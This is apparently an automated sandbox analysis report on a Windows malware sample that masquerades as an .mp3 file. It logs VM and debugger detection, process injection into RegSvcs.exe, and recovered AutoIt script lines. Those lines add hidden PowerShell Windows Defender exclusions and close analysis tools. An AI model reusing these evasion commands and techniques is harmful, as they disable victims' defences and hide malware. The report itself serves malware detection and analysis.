Source: C:\Windows\SysWOW64\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B0F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00B0F826
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B21630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW, 0_2_00B21630
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 7_2_003DE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_003DD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_003DDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_003E9F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_003EA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 7_2_003EA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E65F1 FindFirstFileW,FindNextFileW,FindClose, 7_2_003E65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E7248 FindFirstFileW,FindClose, 7_2_003E7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 7_2_003E72E9
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 16_2_00DFE387
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00DFD836
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00DFDB69
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E09F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_00E09F9F
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_00E0A0FA
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 16_2_00E0A488
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E065F1 FindFirstFileW,FindNextFileW,FindClose, 16_2_00E065F1
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 16_2_00E072E9
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E07248 FindFirstFileW,FindClose, 16_2_00E07248
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B24E14 VirtualQuery,GetSystemInfo, 0_2_00B24E14
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: qwlvpmrupf.mp3.exe, 00000012.00000002.2217353768.0000000001957000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exeT=
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296334976.00000000013F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe5FB536C7
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Thenv
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296334976.00000000013F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe(
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then_$
Source: ngPebbPhbp.exe, 00000000.00000003.1739308660.000000000354F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: OpenWith.exe, 0000000F.00000002.2945020852.0000000003528000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2945020852.00000000035A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe59767-q*
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296872419.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296756734.0000000001398000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297587542.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then30|q
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001787000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076454608.000000000178D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076887703.0000000001790000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077612652.000000000179F000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exev
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078297593.0000000001741000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079283835.0000000001741000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077795230.000000000173F000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077763537.0000000001737000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Thensw
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215199995.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215043797.00000000019DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe|
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") ThengC
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe3A765687Iq
Source: qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") ThenQy
Source: qwlvpmrupf.mp3, 00000007.00000003.1950739253.000000000104C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951848484.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952934549.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950894323.0000000001053000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") ThenP*&
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenp21"
Source: OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then`y
Source: qwlvpmrupf.mp3, 00000007.00000003.1947990948.00000000010A2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947564822.000000000109B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948427869.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950258431.00000000010B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: ngPebbPhbp.exe, 00000000.00000003.1739308660.000000000354F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenVy
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenp21
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296155124.00000000013FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe7>
Source: OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2215043797.00000000019DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213103873.0000000001988000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215757310.000000000198A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: C:\Users\user\Desktop\ngPebbPhbp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EF3FF BlockInput, 7_2_003EF3FF
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B26878
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00375D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00375D78
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2ECAA mov eax, dword ptr fs:[00000030h] 0_2_00B2ECAA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00395078 mov eax, dword ptr fs:[00000030h] 7_2_00395078
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05561277 mov eax, dword ptr fs:[00000030h] 14_2_05561277
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03280283 mov eax, dword ptr fs:[00000030h] 15_3_03280283
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB5078 mov eax, dword ptr fs:[00000030h] 16_2_00DB5078
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C7A45 mov eax, dword ptr fs:[00000030h] 17_2_066C7A45
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066CA22E mov eax, dword ptr fs:[00000030h] 17_2_066CA22E
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066CA28B mov eax, dword ptr fs:[00000030h] 17_2_066CA28B
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B32CE0 GetProcessHeap, 0_2_00B32CE0
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B26878
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B2AAC4
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26A0B SetUnhandledExceptionFilter, 0_2_00B26A0B
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B25BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00B25BBF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003A29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_003A29B2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00390BCF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390D65 SetUnhandledExceptionFilter, 7_2_00390D65
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00390FB1
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DC29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00DC29B2
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00DB0BCF
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0D65 SetUnhandledExceptionFilter, 16_2_00DB0D65
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00DB0FB1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.cs Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 782000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FC5000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 8CD000
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 44A000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 7_2_003D1A91
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00373312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 7_2_00373312
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct") memstr_024668af-4
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $objantivirusproduct in $colitems memstr_839a4043-7
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $usb = $objantivirusproduct.displayname memstr_3ea2d620-a
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: next memstr_40f250bf-8
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $usb memstr_6911e3a1-3
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>antivirus memstr_a788ce8f-d
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func disabler() memstr_9cfc67f4-2
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;if antivirus() = "windows defender" then memstr_88363666-1
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;#requireadmin memstr_35a5b242-c
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide) memstr_e5f8c176-5
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide) memstr_df9b808e-7
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide) memstr_63049b3f-0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide) memstr_b10eb256-9
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide) memstr_b6f8f66e-7
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide) memstr_3c585536-a
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;endif memstr_4dbc1717-4
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>disabler memstr_0c69540c-4
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func antianalysis() memstr_9d395c50-f
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process explorer") then memstr_55a52968-2
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process explorer") memstr_f11f3a3e-1
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp64.exe") memstr_04f452c3-2
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp.exe") memstr_bc9a639d-2
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process hacker") then memstr_c7389a6e-6
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process hacker") memstr_0432f897-0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("processhacker.exe") memstr_2dceed27-f
